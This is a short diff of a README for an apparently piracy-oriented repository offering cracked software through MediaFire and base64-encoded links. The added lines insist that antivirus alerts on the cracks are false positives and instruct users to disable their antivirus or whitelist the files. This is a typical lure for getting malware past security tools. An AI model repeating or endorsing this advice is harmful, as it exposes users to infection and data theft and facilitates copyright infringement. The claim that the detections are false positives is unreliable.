JENOVAAbsolute/128-Bit-Bay-Software/README.md

 ## *Use the Table of Contents below to quickly search for software.
 If what you want is not listed, you can request it on Discord.*

+## *Most trusted sites use premium hosts with slow download speeds and cooldowns.
+I host on MediaFire, which has neither of those drawbacks.*

+## *Cracks are likely to trigger your antivirus.
+It's a false positive.
+Disable your AV or make an exception so the crack is not deleted.*

 ## *You must use a decoder for most downloads: https://www.base64decode.org/*

 ### Table of Contents